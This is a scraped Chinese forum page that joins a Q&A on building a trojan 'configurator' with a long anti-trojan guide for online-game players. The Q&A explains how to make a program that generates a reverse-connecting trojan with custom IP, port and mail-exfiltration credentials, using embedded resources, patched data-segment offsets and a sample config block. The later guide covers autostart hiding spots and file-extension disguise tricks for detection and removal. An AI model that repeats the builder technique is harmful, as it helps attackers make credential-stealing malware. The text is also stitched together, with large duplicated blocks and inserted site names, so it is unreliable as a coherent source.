有些参数需要配置的,不能在源程序就写进去,比如反弹木马连接的IP或域名,端口等。这些是应该是可以更改的。我写出了的都是在源代码中就固定了的,不能修改。就是不能配置。看那些配置程序,填好一些参数后,就能生成一个木马,一个可执行程序,我不明白,怎样从一个可执行程序,生成另一个可执行程序。请高手指点。第一个问题,如何让一个程序A生成另一个程序B?
方法一,以二进制方式写文件(不推荐)
这种办法就是将要被程序B的二进制数据写入到程序A的代码中
按照文件读写的办法生成文件
这样做的缺点是将生成一个庞大的源文件
充斥着很大篇幅没有可读意义的二进制数据
编译和修改都很慢,因此不推荐
方法二,资源方式(推荐)
程序B作为程序A的一个资源而存在
程序A运行时读取自己的资源并释放到文件即可
这部分代码简单实用
Delphi示例
http://hi.baidu.com/shilyx/blog/item/0d9df4dc6eddcaa0cc11661b.html
VC示例
http://hi.baidu.com/shilyx/blog/item/2ca96763b5231b610c33facd.html
第二个问题,如何配置产生的程序B?
我给出两个办法,都可行
方法一,全局变量
程序B中需要配置的参数采用全局变量描述
全局变量在生成的可执行文件中的偏移地址是固定的
找出这些地址常数
在程序A生成程序B的时候即时修改为希望的数据即可
如何找出地址常数?其实很简单
编译一个程序B 生成B1.exe
改变某全局变量的值 编译生成B2.exe
对比B1.EXE和B2.EXE 不同的地方便是全区变量的地址了
方法二,使用资源
配置部分作为程序B的资源而存在
程序B运行的时候先读取自身的资源获得配置信息
这样配置B既是配置B的资源
专门有一套API函数是针对更新程序资源的
诸如BeginUpdateResource, EndUpdateResource, UpdateResource等等
A生成B之后,紧接着按照配置信息更新B的配置资源即可
方法一,以二进制方式写文件(不推荐)
这种办法就是将要被程序B的二进制数据写入到程序A的代码中
按照文件读写的办法生成文件
这样做的缺点是将生成一个庞大的源文件
充斥着很大篇幅没有可读意义的二进制数据
编译和修改都很慢,因此不推荐
方法二,资源方式(推荐)
程序B作为程序A的一个资源而存在
程序A运行时读取自己的资源并释放到文件即可
这部分代码简单实用
Delphi示例
http://hi.baidu.com/shilyx/blog/item/0d9df4dc6eddcaa0cc11661b.html
VC示例
http://hi.baidu.com/shilyx/blog/item/2ca96763b5231b610c33facd.html
第二个问题,如何配置产生的程序B?
我给出两个办法,都可行
方法一,全局变量
程序B中需要配置的参数采用全局变量描述
全局变量在生成的可执行文件中的偏移地址是固定的
找出这些地址常数
在程序A生成程序B的时候即时修改为希望的数据即可
如何找出地址常数?其实很简单
编译一个程序B 生成B1.exe
改变某全局变量的值 编译生成B2.exe
对比B1.EXE和B2.EXE 不同的地方便是全区变量的地址了
方法二,使用资源
配置部分作为程序B的资源而存在
程序B运行的时候先读取自身的资源获得配置信息
这样配置B既是配置B的资源
专门有一套API函数是针对更新程序资源的
诸如BeginUpdateResource, EndUpdateResource, UpdateResource等等
A生成B之后,紧接着按照配置信息更新B的配置资源即可
加壳
很简单,你可以采用下面的方法:
首先,把木马客户端(也就是生成出来的那个东西)需要被配置的参数专门为它们新建一个区段,把这些参数放到区段里,以便于下一面的操作,当然,这些都要在源代码中完成。比如:
#pragma data_seg("Marshal")
BOOL ASP=0x1;//aaaaaaaa;
BOOL MAIL=0x1;
char szUserName[128]="mail_user_name",
char szPassWord[128]="mail_pass_word",
char szMailSubject[126]="邮件标题",
char szMailBox[128]="@@@@@@123.com"
#pragma data_seg()
这样就新建了一个区段,确保这些全局变量在PE文件中的位置是相邻的
接下来,你可以用WinHex、UltraEdit等十六进制编辑器打开你的木马客户端,来查找这些配置信息的偏移位置,记下,以后用配置程序就是往这些地方来写配置参数了。
你可以把木马客户端当成一个二进制资源编译到配置器里,这样生成的时候,仅仅是把资源释放出来,然后把配置信息写入到生成的木马客户端的固定偏移处而已。
写配置信息的方法多种多样,以上仅仅是一种而已。
首先,把木马客户端(也就是生成出来的那个东西)需要被配置的参数专门为它们新建一个区段,把这些参数放到区段里,以便于下一面的操作,当然,这些都要在源代码中完成。比如:
#pragma data_seg("Marshal")
BOOL ASP=0x1;//aaaaaaaa;
BOOL MAIL=0x1;
char szUserName[128]="mail_user_name",
char szPassWord[128]="mail_pass_word",
char szMailSubject[126]="邮件标题",
char szMailBox[128]="@@@@@@123.com"
#pragma data_seg()
这样就新建了一个区段,确保这些全局变量在PE文件中的位置是相邻的
接下来,你可以用WinHex、UltraEdit等十六进制编辑器打开你的木马客户端,来查找这些配置信息的偏移位置,记下,以后用配置程序就是往这些地方来写配置参数了。
你可以把木马客户端当成一个二进制资源编译到配置器里,这样生成的时候,仅仅是把资源释放出来,然后把配置信息写入到生成的木马客户端的固定偏移处而已。
写配置信息的方法多种多样,以上仅仅是一种而已。
这个很简单
内容贴在这里太多了 我发个链接地址吧 上面内容丰富
http://www.ycycn.com/blog/article.asp?id=301
PS:你木马需要配置的参数定义为全局变量
内容贴在这里太多了 我发个链接地址吧 上面内容丰富
http://www.ycycn.com/blog/article.asp?id=301
PS:你木马需要配置的参数定义为全局变量
木马的工作原理是什么?
因为号被盗了两次,决心来把木马弄明白.还想请教一点,如果我已经中了木马,但我进游戏是用的复制+粘贴密码的,还会被盗吗?rn好的追加20分..谢谢~!!“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种者的电脑。“木马”与计算机网络中常常要用到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“木马”则完全相反,木马要达到的是“偷窃”性的远程控制,如果没有很强的隐蔽性的话,那就是“毫无价值”的。
一个完整的“木马”程序包含了两部分:“服务器”和“控制器”。植入被种者电脑的是“服务器”部www.rixia.cc分,而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。运行了木马程序的“服务器”以后,被种者的电脑就会有一个或几个端口被打开,使黑客可以利用这些打开的端口进入电脑系统,安全和个人隐私也就全无保障了!
病毒是附着于程序或文件中的一段计算机代码,它可在计算机之间传播。它一边传播一边感染计算机。病毒可损坏软件、硬件和文件。
病毒 (n.):以自我复制为明确目的编写的代码。病毒附着于宿主程序,然后试图在计算机之间传播。它可能损坏硬件、软件和信息。
与人体病毒按严重性分类(从 Ebola 病毒到普通的流感病毒)一样,计算机病毒也有轻重之分,轻者仅产生一些干扰,重者彻底摧毁设备。令人欣慰的是,在没有人员操作的情况下,真正的病毒不会传播。必须通过某个人共享文件和发送电子邮件来将它一起移动。
“木马”全称是“特洛伊木马(TrojanHorse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员(或居心不良的马夫)在其可从网络上下载(Download)的应用程序或游戏外挂、或网页中,包含了可以控制用户的计算机系统或通过邮件盗取用户信息的恶意程序,可能造成用户的系统被破坏、信息丢失甚至令系统瘫痪。
一、木马的特性
特洛伊木马属于客户/服务模式。它分为两大部分,既客户端和服务端。其原理是一台主机提供服务(服务器端),另一台主机接受服务(客户端),作为服务器的主机一般会打开一个默认的端口进行监听。如果有客户机向服务器的这一端口提出连接请求,服务器上的相应程序就会自动运行,来答应客户机的请求。这个程序被称为进程。
木马一般以寻找后门、窃取密码为主。统计表明,现在木马在病毒中所占的比例已经超过了四分之一,而在近年涌起的病毒潮中,木马类病毒占绝对优势,并将在未来的若干年内愈演愈烈。木马是一类特殊的病毒,如果不小心把它当成一个软件来使用,该木马就会被“种”到电脑上,以后上网时,电脑控制权就完全交给了“黑客”,他便能通过跟踪击键输入等方式,窃取密码、信用卡号码等机密资料,而且还可以对电脑进行跟踪监视、控制、查看、修改资料等操作。
二、木马发作特性
在使用计算机的过程中如果您发现:计算机反应速度发生了明显变化,硬盘在不停地读写,鼠标不听使唤,键盘无效,自己的一些窗口在被关闭,新的窗口被莫名其妙地打开,网络传输指示灯一直在闪烁,没有运行大的程序,而系统却越来越慢,系统资源站用很多,或运行了某个程序没有反映(此类程序一般不大,从十几k到几百k都有)或在关闭某个程序时防火墙探测到有邮件发出……这些不正常现象表明:您的计算机中了木马病毒。
三、木马的工作原理以及手动查杀介绍
由于大多玩家对安全问题了解不多,所以并不知道自己的计算机中了“木马”该怎么样清除。因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现“木马”。相信你看了这篇文章之后,就会成为一名查杀“木马”的高手了。(如果成不了高手建议大家用皮筋打斑竹家玻璃,嘿嘿)
“木马”程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False。ShowInTaskBar设为False,程序运行时就不会出现在任务栏中了。在任务管理器中隐形:将程序设为“系统服务”可以很轻松地伪装自己。
A、启动组类(就是机器启动时运行的文件组)
当然木马也会悄无声息地启动,你当然不会指望用户每次启动后点击“木马”图标来运行服务端,(没有人会这么傻吧??)。“木马”会在每次用户启动时自动装载服务端,Windows系统启动时自动加载应用程序的方法,“木马”都会用上,如:启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。通过win.ini和system.ini来加载木马。在Windows系统中,win.ini和system.ini这两个系统配置文件都存放在C:windows目录下,你可以直接用记事本打开。可以通过修改win.ini文件中windows节的“load=file.exe,run=file.exe”语句来达到木马自动加载的目的。此外在system.ini中的boot节,正常的情况下是“Shell=Explorer.exe”(Windows系统的图形界面命令解释器)。下面具体谈谈“木马”是怎样自动加载的。
1、在win.ini文件中,在[WINDOWS]下面,“run=”和“load=”是可能加载“木马”程序的途径,必须仔细留心它们。一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。当然你也得看清楚,因为好多“木马”,如“AOLTrojan木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件。
通过c:windowswininit.ini文件。很多木马程序在这里做一些小动作,这种方法往往是在文件的安装过程中被使用,程序安装完成之后文件就立即执行,与此同时安装的原文件被Windows删除干净,因此隐蔽性非常强,例如在wininit.ini中如果Rename节有如下内容:NUL=c:windowspicture.exe,该语句将c:windowspicture.exe发往NUL,这就意味着原来的文件pictrue.exe已经被删除,因此它运行起来就格外隐蔽。
2、在system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell=explorer.exe程序名”,那么后面跟着的那个程序就是“木马”程序,就是说你已经中“木马”了。
win.ini、system.ini文件可以通过“开始”菜单里的“运行”来查看。只要在“运行”对话框中输入“msconfig”,后点击“确定”按钮就行了。(这里大家一定要注意,如果你对计算机不是很了解,请不要输入此命令或删除里边的文件,否则一切后果和损失自己负责。斑竹和本人不承担任何责任。)
3、对于下面所列的文件也要勤加检查,木马们也可能隐藏在
C:\windows\winstart.bat和C:\windows\winnint.ini,还有Autoexec.bat
B、注册表(注册表就是注册表,懂电脑的人一看就知道了)
1、从菜单中加载。如果自动加载的文件是直接通过在Windows菜单上自定义添加的,一般都会放在主菜单的“开始->程序->启动”处,在Win98资源管理器里的位置是“C:windowsstartmenuprograms启动”处。通过这种方式使文件自动加载时,一般都会将其存放在注册表中下述4个位置上:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserS!hellFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\UserShellFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellFolders
2、在注册表中的情况最复杂,在点击至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE,这里切记:有的“木马”程序生成的文件很像系统自身文件,想通过伪装蒙混过关,如“AcidBatteryv1.0木马”,它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的Explorer键值改为Explorer=“C:\WINDOWS\expiorer.exe”,“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序,如:“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能,最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名,再在整个注册表中搜索即可。
3、此外在注册表中的HKEY_CLASSES_ROOT\exefile\shell\open\command=
“1”“*”处,如果其中的“1”被修改为木马,那么每次启动一个该可执行文件时木马就会启动一次,例如著名的冰河木马就是将TXT文件的Notepad.exe改成!了它自己的启动文件,每次打开记事本时就会自动启动冰河木马,做得非常隐蔽。
注册表可以通过在“运行”对话框中输入“regedit”来查看。需要说明的是,对系统注册表进行删除修改操作前一定要将注册表备份,因为对注册表操作有一定的危险性,加上木马的隐藏较隐蔽,可能会有一些误操作,如果发现错误,可以将备份的注册表文件导入到系统中进行恢复。(次命令同样很危险,如不懂计算机请不要尝试。切记)
C、端口(端口,其实就是网络数据通过操作系统进入计算机的入口)
1、万变不离其宗,木马启动都有一个方式,它只是在一个特定的情况下启动。所以平常多注意你的端口。一般的木马默认端口有
BO31337,YAL1999,Deep2140,Throat3150,冰河7636,Sub71243
那么如何查看本机开放哪些端口呢?
在dos里输入以下命令:netstat-an,就能看到自己的端口了,一般网络常用端口有:21,23,25,53,80,110,139,如果你的端口还有其他的,你可要注意了,因为现在有许多木马可以自己设定端口。(上面这些木马的端口是以前的,由于时间和安全的关系现在好多新木马的端口我不知道,也不敢去试,因为技术更新的太快了,我跟不上了。55555555555555)
2、由于木马的运行常通过网络的连接来实现的,因此如果发现可疑的网络连接就可以推测木马的存在,最简单的办法是利用Windows自带的Netstat命令来查看。一般情况下,如果没有进行任何上网操作,在MS-DOS窗口中用Netstat命令将看不到什么信息,此时可以使用“netstat-a”,“-a”选项用以显示计算机中目前所有处于监听状态的端口。如果出现不明端口处于监听状态,而目前又没有进行任何网络服务的操作,那么在监听该端口的很可能是木马。
3、系统进程:
在Win2000/XP中按下“CTL+ALT+DEL”,进入任务管理器,就可看到系统正在运行的全部进程,一一清查即可发现木马的活动进程。
在Win98下,查找进程的方法不那么方便,但有一些查找进程的工具可供使用。通过查看系统进程这种方法来检测木马非常简便易行,但是对系统必须熟悉,因为Windows系统在运行时本身就有一些我们不是很熟悉的进程在运行着,因此这个时候一定要小心操作,木马还是可以通过这种方法被检测出来的。
四、软件查杀木马介绍
上面所介绍的都是以手工方式来检测或者清除木马,但一般情况下木马没有那么容易就能发现,木马是很会隐藏的哦。幸好在已经有了不少的反木马软件。下面介绍几款软件,
1、瑞星杀毒软件。
2、个人版天网防火墙。根据反弹式木马的原理,就算你中了别人的木马,但由于防火墙把你的计算机和外界隔开,木马的客户端也连接不上你。防火墙启动之后,一旦有可疑的网络连接或者木马对电脑进行控制,防火墙就会报警,同时显示出对方的IP地址、接入端口等提示信息,通过手工设置之后即可使对方无法进行攻击。不过对于一些个别机器来说,运行天网会影响机器的运行速度。
3、木马克星。目前具我所知,是只查杀木马的软件,也是能查杀木马种类最多的软件。顾名思义,木马克星不克乾坤无敌槌也不克北冥槌法,专克各种木马。但也不是绝对哦,好象“灰鸽子”能屏蔽掉木马克星。(听说而已没试过哦。“灰鸽子”也是一种木马,和冰河差不多。)(现在木马克星大多是没注册的版本。用木马克星查木马时,要是提示你发现木马只有注册用户才能清除,这只是作者的一个小手段,其实他的意思是如果发现木马,那么只有注册用户才能清楚,要是真的发现了木马,软件会告诉你木马的具体位置和名字是什么。我们用其他的软件和手段清除不就行了)
4。绿鹰PC万能精灵。他会实时监控你的计算机,看着“系统安全”心理舒服多了。
有了类似的这些防护软件,你的计算机基本上是安全了。但道高一尺,魔高一丈。最近又出现了一种可以把木马伪装易容的程序(不知道是哪个高手搞的,很是厉害),就是把木马本体根据排列组合生成多个木马,而杀毒软件只能查杀他们的母体。而后生成的木马就不能查到了,所以手动人工的清除木马我们还是要掌握一些地。
软件查杀其他病毒很有效,对木马的检查也是蛮成功地,但彻底地清除不很理想,因为一般情况下木马在电脑每次启动时都会自动加载,而杀病毒软件却不能完全清除木马文件,总的说来,杀病毒软件作为防止木马的入侵来说更有效。
五、木马的防御
随着网络的普及和网络游戏装备可以换人民币的浪潮,木马的传播越来越快,而且新的变种层出不穷,我们在检测清除它的同时,更要注意采取措施来预防它,下面列举几种预防木马的方法。(大家的意见,我借用而已)
1、不要下载、接收、执行任何来历不明的软件或文件
很多木马病毒都是通过绑定在其他的软件或文件中来实现传播的,一旦运行了这个被绑定的软件或文件就会被感染,因此在下载的时候需要特别注意,一般推荐去一些信誉比较高的站点。在软件安装之前一定要用反病毒软件检查一下,建议用专门查杀木马的软件来进行检查,确定无毒和无马后再使用。
2、不要随意打开邮件的附件,也不要点击邮件中的可疑图片。(后边另外介绍一个关于邮件的例子,大家注意收看。)
3、将资源管理器配置成始终显示扩展名。将Windows资源管理器配置成始终显示扩展名,一些文件扩展名为vbs、shs、pif的文件多为木马病毒的特征文件,如果碰到这些可疑的文件扩展名时就应该引起注意。
4、尽量少用共享文件夹。如果因工作等原因必须将电脑设置成共享,则最好单独开一个共享文!件夹,把所有需共享的文件都放在这个共享文件夹中,注意千万不要将系统目录设置成共享。
5、运行反木马实时监控程序。木马防范重要的一点就是在上网时最好运行反木马实时监控程序,PC万用精灵等软件一般都能实时显示当前所有运行程序并有详细的描述信息。此外如加上一些专业的最新杀毒软件、个人防火墙等进行监控基本就可以放心了。
6、经常升级系统。很多木马都是通过系统漏洞来进行攻击的,微软公司发现这些漏洞之后都会在第一时间内发布补丁,很多时候打过补丁之后的系统本身就是一种最好的木马防范办法。
六、木马传播的个别范例(给大家介绍一个邮件类的)
1、来自网络的攻击手段越来越多了,一些带木马的恶意网页会利用软件或系统操作平台等的安全漏洞,通过执行嵌入在网页HTML超文本标记语言内的JavaApplet小应用程序、javascript脚本语言程序、ActiveX软件部件交互技术支持可自动执行的代码程序,强行修改用户操作系统的注册表及系统实用配置程序,从而达到非法控制系统资源、破坏数据、格式化硬盘、感染木马程序、盗取用户数据资料等目的。
目前来自网页的攻击分为两种:一种是通过编辑的脚本程序修改IE浏览器;另外一种是直接破坏Windows系统。前者一般会修改IE浏览器的标题栏、默认主页或直接将木马“种”在你的机器里等等;后者是直接锁定你的键盘、鼠标等输入设备然后对系统进行破坏。
(作者插言):还好目前盗取千年用户名和密码的“木马”功能还仅仅是偷盗行为,没有发展成破坏行为。要不然号被盗了,在顺便把硬盘被格式化了。那样想第一时间找回密码就都没可能。希望这种情况不要发生。(啊门我弥佗佛)
下边是正题了,大家看仔细了!
假如您收到的邮件附件中有一个看起来是这样的文件(或者貌似这类文件,总之是特别诱人的文件,而且格式还很安全。):QQ靓号放送.txt,您是不是认为它肯定是纯文本文件?我要告诉您,不一定!它的实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来,您看到的就是个.txt文件,这个文件实际上等同于QQ靓号放送.txt.html。那么直接打开这个文件为什么有危险呢?请看如果这个文件的内容如下:
您可能以为它会调用记事本来运行,可是如果您双击它,结果它却调用了HTML来运行,并且自动在后台开始通过网页加载木马文件。同时显示“正在打开文件”之类的这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧?
欺骗实现原理:当您双击这个伪装起来的.txt时候,由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B},也就是.html文件,于是就会以html文件的形式运行,这是它能运行起来的先决条件。
在某些恶意网页木马中还会调用“WScript”。
WScript全称WindowsScriptingHost,它是Win98新加进的功能,是一种批次语言/自动执行工具——它所对应的程序“WScript.exe”是一个脚本语言解释器,位于c:\WINDOWS下,正是它使得脚本可以被执行,就象执行批处理一样。在WindowsScriptingHost脚本环境里,预定义了一些对象,通过它自带的几个内置对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。
最近听不少玩家反映,许多马夫通过冒充千年官方网站的办法给玩家发名字类似“您的千年密码确认函”、“您的千年资料保护建议”等的邮件,来骗取玩家的信任,来点击运行该木马邮件。希望广大玩家在点击这类邮件时一定要看清邮件是否来自于千年官方网站。如是来自其他什么网站或个人邮箱的,马上删除,记得一定要马上删除,别抱任何侥幸心理。
七、关于“木马”的防御(纯属个人意见,不付法律责任)
防止木马对在家上网来说是很简单的事,无非就是装一大堆杀毒软件,并及时升级。(再新的木马只要传播速度快的话很快就会成为各种杀毒软件的战利品,除非此人专门定做个人木马)在加上天网防火墙(很多黑客就是利用口令和漏洞进行远程控制,该防火墙可以防止口令和漏洞入侵)基本上就可以解决问题啦,除非是自己好奇或是不小心打开了木马服务端,我想这种情况还是占一定的比例!
但是对网吧上网的来说,再好的防御也是白撤。
据我所知,现在的网吧安全系数几乎等于00000000,现在最厉害的应该就是装个还“原精灵吧”,但是......我个人认为那东西用处不是很大,说是保护用户密码还不如说它是网吧保护系统的一种软件。现在的木马一般都是通过邮件方式传送密码的,也就是说,你只要在输入框内输入你的密码之后,木马控制方就已经得到你的ID和密码了(一般不会超过三分钟)!对网吧上网的朋友来说,靠复制方法输入ID和密码算最安全的了,很多木马程序实际上就是一个键盘记录工具,在你不知情的情况下把你的键盘输入情况全部记录了下来,然后通过网络发送出去!(好可怕哦,不过具我所知现在公安部和文化部已经明令禁止网吧安装还原精灵了,说是为了保留历史记录云云。唉~~就这么点防御手段也给封杀了,哭哦)
总之,家庭上网用户记得随时更新自己的病毒库,随时检查计算机进程,发现不明进程马上格杀,不浏览一些不明站点(我通常是靠域名来分析站点的可靠程度,一般一级域名都不会出现恶意代码和网页木马),更别随意接收别人给你发送的文件和邮件!
网吧防盗真的很困难了,什么人都有,复杂了,就算老板花钱去注册一个木马克星,呵呵。。。都没用,想做坏事的人同样能把他干掉~~~~我个人认为,网吧上网除了复制ID密码粘贴到输入框,其他的就得听天由命了~~~~~
八、关于大家都用的醉翁巷1.1G的说明
用了人家的软件,就总要替人家说句公道话。前些时候,有人说醉翁1.1G软件运行后,没什么反映。当关闭软件的一刹那,一些防护类软件提示:此软件正在监视本机键盘!!
其实就是醉翁巷中的hook.dll文件在作怪。下面给大家说说“勾子”的我问题。
什么是勾子
在Windows系统中,勾子(hook)是一种特殊的消息处理机制。勾子可以监视系统或进程中的各种事件消息,截获发往目标窗口的消息并进行处理。这样,我们就可以在系统中安装自定义的勾子,监视系统中特定事件的发生,完成特定的功能,比如截获键盘、鼠标的输入,屏幕取词,日志监视等等。可见,利用勾子可以实现许多特殊而有用的功能。因此,对于高级编程人员来说,掌握勾子的编程方法是很有必要的。
勾子的类型
按使用范围分类,主要有线程勾子和系统勾子
(1)线程勾子监视指定线程的事件消息。
(2)系统勾子监视系统中的所有线程的事件消息。因为系统勾子会影响系统中所有的应用程序,所以勾子函数必须放在独立的动态链接库(DLL)中。这是系统勾子和线程勾子很大的不同之处。
醉翁巷中的hook.dll就是完成以上功能的程序,由于勾子对程序的特殊性,所以会有部分软件报告发现他在记录键盘动作,不过不会报告说他是木马。(呵呵搞的确实挺吓人的。不过就算它记录键盘动作,只要不发送就没太大危险了)
九、大总结(就是对上边的大总结啦)
大家知道了“木马”的工作原理,查杀“木马”就变得很容易,如果发现有“木马”存在,最安全也是最有效的方法就是马上将计算机与网络断开,防止黑客通过网络对你进行攻击。然后在根据实际情况进行处理。
下面给大家说一下我机器的防护装备:(一共就5样)
XFILTER日夏养花网个人防火墙:这个防火墙没什么防病毒的功能,它只监视所有未经过我个人许可的程序连接网络。任何程序连接网络它都会通告并询问。比如安装完该软件“第一次”运行千年,它会提示你C:\ProgramFiles\1000y\Client.exe要连接网络,是否放行。它就是这样来防范的。
瑞星杀毒软件:以杀各种恶意病毒和木马为主,2004版专门提供游戏保护。
还原精灵:记录当前硬盘和系统信息。不管以后对硬盘和系统进行什么操作都能还原成初始模样。比如我们2003年11月1日对当前C硬盘和系统进行备份保存,2003年12月1日由于感染木马,对系统进行还原,还原后所有东西都会回到2003年11月1日备份是的样子。不论你在C盘上进行了什么操作,都会变回备份时的样子。这个软件就有一个缺点,会影响机器的启动速度。但不影响机器的运行。最近还有朋友反映新版本和某些游戏有冲突。
木马克星:这个我就不多说了,网络游戏玩家必备的东东。
十六进制编译器:具体名字我就不说了,有兴趣的朋友随便找一个用就行了。主要是对一些可疑程序进行扫描和检测。
以上各个软件在各大门户网站和各大下载专业网站都可以找到,在这里小女子就不提供网址了,避免不必要的麻烦。
一个完整的“木马”程序包含了两部分:“服务器”和“控制器”。植入被种者电脑的是“服务器”部www.rixia.cc分,而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。运行了木马程序的“服务器”以后,被种者的电脑就会有一个或几个端口被打开,使黑客可以利用这些打开的端口进入电脑系统,安全和个人隐私也就全无保障了!
病毒是附着于程序或文件中的一段计算机代码,它可在计算机之间传播。它一边传播一边感染计算机。病毒可损坏软件、硬件和文件。
病毒 (n.):以自我复制为明确目的编写的代码。病毒附着于宿主程序,然后试图在计算机之间传播。它可能损坏硬件、软件和信息。
与人体病毒按严重性分类(从 Ebola 病毒到普通的流感病毒)一样,计算机病毒也有轻重之分,轻者仅产生一些干扰,重者彻底摧毁设备。令人欣慰的是,在没有人员操作的情况下,真正的病毒不会传播。必须通过某个人共享文件和发送电子邮件来将它一起移动。
“木马”全称是“特洛伊木马(TrojanHorse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员(或居心不良的马夫)在其可从网络上下载(Download)的应用程序或游戏外挂、或网页中,包含了可以控制用户的计算机系统或通过邮件盗取用户信息的恶意程序,可能造成用户的系统被破坏、信息丢失甚至令系统瘫痪。
一、木马的特性
特洛伊木马属于客户/服务模式。它分为两大部分,既客户端和服务端。其原理是一台主机提供服务(服务器端),另一台主机接受服务(客户端),作为服务器的主机一般会打开一个默认的端口进行监听。如果有客户机向服务器的这一端口提出连接请求,服务器上的相应程序就会自动运行,来答应客户机的请求。这个程序被称为进程。
木马一般以寻找后门、窃取密码为主。统计表明,现在木马在病毒中所占的比例已经超过了四分之一,而在近年涌起的病毒潮中,木马类病毒占绝对优势,并将在未来的若干年内愈演愈烈。木马是一类特殊的病毒,如果不小心把它当成一个软件来使用,该木马就会被“种”到电脑上,以后上网时,电脑控制权就完全交给了“黑客”,他便能通过跟踪击键输入等方式,窃取密码、信用卡号码等机密资料,而且还可以对电脑进行跟踪监视、控制、查看、修改资料等操作。
二、木马发作特性
在使用计算机的过程中如果您发现:计算机反应速度发生了明显变化,硬盘在不停地读写,鼠标不听使唤,键盘无效,自己的一些窗口在被关闭,新的窗口被莫名其妙地打开,网络传输指示灯一直在闪烁,没有运行大的程序,而系统却越来越慢,系统资源站用很多,或运行了某个程序没有反映(此类程序一般不大,从十几k到几百k都有)或在关闭某个程序时防火墙探测到有邮件发出……这些不正常现象表明:您的计算机中了木马病毒。
三、木马的工作原理以及手动查杀介绍
由于大多玩家对安全问题了解不多,所以并不知道自己的计算机中了“木马”该怎么样清除。因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现“木马”。相信你看了这篇文章之后,就会成为一名查杀“木马”的高手了。(如果成不了高手建议大家用皮筋打斑竹家玻璃,嘿嘿)
“木马”程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False。ShowInTaskBar设为False,程序运行时就不会出现在任务栏中了。在任务管理器中隐形:将程序设为“系统服务”可以很轻松地伪装自己。
A、启动组类(就是机器启动时运行的文件组)
当然木马也会悄无声息地启动,你当然不会指望用户每次启动后点击“木马”图标来运行服务端,(没有人会这么傻吧??)。“木马”会在每次用户启动时自动装载服务端,Windows系统启动时自动加载应用程序的方法,“木马”都会用上,如:启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。通过win.ini和system.ini来加载木马。在Windows系统中,win.ini和system.ini这两个系统配置文件都存放在C:windows目录下,你可以直接用记事本打开。可以通过修改win.ini文件中windows节的“load=file.exe,run=file.exe”语句来达到木马自动加载的目的。此外在system.ini中的boot节,正常的情况下是“Shell=Explorer.exe”(Windows系统的图形界面命令解释器)。下面具体谈谈“木马”是怎样自动加载的。
1、在win.ini文件中,在[WINDOWS]下面,“run=”和“load=”是可能加载“木马”程序的途径,必须仔细留心它们。一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。当然你也得看清楚,因为好多“木马”,如“AOLTrojan木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件。
通过c:windowswininit.ini文件。很多木马程序在这里做一些小动作,这种方法往往是在文件的安装过程中被使用,程序安装完成之后文件就立即执行,与此同时安装的原文件被Windows删除干净,因此隐蔽性非常强,例如在wininit.ini中如果Rename节有如下内容:NUL=c:windowspicture.exe,该语句将c:windowspicture.exe发往NUL,这就意味着原来的文件pictrue.exe已经被删除,因此它运行起来就格外隐蔽。
2、在system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell=explorer.exe程序名”,那么后面跟着的那个程序就是“木马”程序,就是说你已经中“木马”了。
win.ini、system.ini文件可以通过“开始”菜单里的“运行”来查看。只要在“运行”对话框中输入“msconfig”,后点击“确定”按钮就行了。(这里大家一定要注意,如果你对计算机不是很了解,请不要输入此命令或删除里边的文件,否则一切后果和损失自己负责。斑竹和本人不承担任何责任。)
3、对于下面所列的文件也要勤加检查,木马们也可能隐藏在
C:\windows\winstart.bat和C:\windows\winnint.ini,还有Autoexec.bat
B、注册表(注册表就是注册表,懂电脑的人一看就知道了)
